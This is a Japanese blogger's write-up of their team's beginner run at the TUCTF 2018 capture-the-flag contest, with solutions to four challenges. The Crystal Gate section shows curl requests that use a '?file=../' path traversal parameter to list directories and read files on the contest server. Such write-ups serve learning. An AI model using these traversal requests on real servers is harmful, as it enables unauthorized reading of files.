TUCTF2018に参加した

TUCTFというのにチームjikyu600で参加できました。
もともとこっち方面で友達がほとんどいないんですが、研究室の先輩とその先輩の知り合いと、毎度質問ばっかして迷惑かけてしまっている先輩の3人が出てみたいと駄々こねたら忙しい中参加してくれてめちゃくちゃ咽び泣いた。サンキュですほんま・・・

ほぼ初心者のチームなために2日で1問解ければいいなあ程度でゆるく挑戦して、111位とかなりいいんじゃないか!?という結果になった

f:id:Owatank:20181128221728p:plain

自分はLiteral Ancient Easter Egg: Copper Gate Easter Egg: Crystal Gate の4つを解いた。

Literal(misc 50pt)

問題文にあったURLをwget http://18.222.124.7したらLiteral.htmlというのが見えたのでwget http://18.222.124.7/Literal.htmlで中身みる

<html>
  <head>
  <meta http-equiv="Refresh" content="1; url=https://en.wikipedia.org/wiki/Fork_bomb">
  </head>
  <body>
  <!--
        *   *                     f   f   f
      *  ** *                   ff  ff  ff
      * * ** ||                ff  ff  ff
    **   ||||T||              fUffffffff
      *   |C|||T| oooooooooooo fFff
           |||||||{ooooooooooRfff3o
          ooo4ooooooooooooooLff.ooooo0
        oooNooooooooooooooo3ooooooo5ooo.
        oooo4oooooRoooooooooo3oooooooooo.
        oooDooooo4oooooNooooooooooooooooo
        ooooooooooooooGoooooooooooooooooo
        ooooooooooooooooooooo3oooooooooRo
         oooooooo0oooooooooooooooooooooo
          oooooooffUoooooooooooooooooo
            ooofff5ooooooooooooooooo
             fff }ooooooooooooooo
            fff
  -->
  Redirecting to Wikipedia...!
  </body>
</html>

trコマンドで文字除去したりしてflagが得られた

Ancient(misc 464pt)

可愛いイモリと暗号もどきが写った画像が渡される
f:id:Owatank:20181128223106p:plain
チームの人曰くヒョウモントカゲモドキらしい

ステガノグラフィーってやつなのかなと思ったけどそうではなく画像からflagを読み取る系とのこと。トカゲモドキがヒントとか
特にトカゲモドキでピンと来なくて、 The lizard is meant as a visual clue to describing the language この言葉をヒントにググる
Lizard Languageでググったら教育番組もどきが出てきたけど全く違かった。足跡に意味は?と思いlanguage footprintググると画像検索で足跡とアルファベットの対応表が出てきた。
うまい具合に問題の画像にある足跡とも対応してたので、地道にアルファベットに直していくとTHE FLAG IS IF_ONLY_JURASSIC_PARK_WAS_LIKE_THISという文字列が得られた。

解いた後に問題文を読むと

Gurney showed me this tablet he found on some far off secret island, but I have no idea what it says... (Standard flag format, letters in all caps)

James Gurneyがダイノトピアという絵本を書いていたらしく、その中で足跡をアルファベットに対応させる表とかが出ていたらしい。いやかいけつゾロリしか知らんし・・・デルトラクエストすらエアプやし・・

Easter Egg: Copper Gate(web 258pt)

指定されたURLに飛ぶと工事中みたいな感じのページがでる。疑心暗鬼すぎてバナー画像が手がかりと思ってそっちを怪しんでしまっていた。
なんもねーと思ってたけどバナー画像が images/bannar.png だったの思い出して /images に移動する。するとsitenotes.txtというのがあった。
中身は Site is in development, but active updates can be viewed by going to /devvvvv/index.html と書かれていたのでそこに移動する。そこから /devvvvv に移動して最終的には /enterthecoppergate/gate.html にたどり着いて flag がゲットできた。

Easter Egg系の問題はレディプレイヤーワンが元ネタらしいんだけど、自分以外のチーム全員元ネタ知ってたらしくて困惑した。映画みんな詳しい・・・

Easter Egg: Crystal Gate(web 446pt)

基本的にこの問題は Copper Gate -> Jade Gate -> Crystal Gate と順に解いていく。Jade Gateを別の人が解いてくれて、flagがあった場所にCrystal Gateを解くための手がかりとなる画像があったので調べる

$ exiftool star.jpg
...
`XP Comment: /crystalsfordays/traversethebridge.php`
...

/crystalsfordays/traversethebridge.phpに飛ぶと次のような文が書いてある

Note: Only used for access management and to check user info.
Note2: I can’t seem to remember the param. It’s “file”

paramからチームの人が ?file=../ と ?file=../../ でトラバースしてた

$ curl http://18.191.167/crystalsfordays/traversethebridge.php?file=../
Note: Only used for access management and to check user info.<br>Note2: I can't seem to remember the param. It's "file"<br>..
enterthecoppergate
devvvvv
youfoundthejadegate
images
.git
.
index.html
crystalsfordays
$ curl http://18.191.167/crystalsfordays/traversethebridge.php?file=../../
Note: Only used for access management and to check user info.<br>Note2: I can't seem to remember the param. It's "file"<br>..
.bash_history
webserver
.
.bash_logout
.bashrc
.bash_profile
TheEgg.html

そこで詰まったらしいけど、$ curl -X POST -v http://18.191.167/crystalsfordays/traversethebridge.php?file=../../TheEgg.html してみたらflagが出てきた。別にPOSTしなくてもGETでも取れた

初心者向けのCTFってあっただけに難易度がマイルドな感じの多くてよかった。なんだけど
f:id:Owatank:20181128230914p:plain 流石にチームみんなpwn真っ黒でやべえな・・・練習しとこ・・・てな感じで終わった
めっちゃ楽しい土日だった。ハンバーグがうまい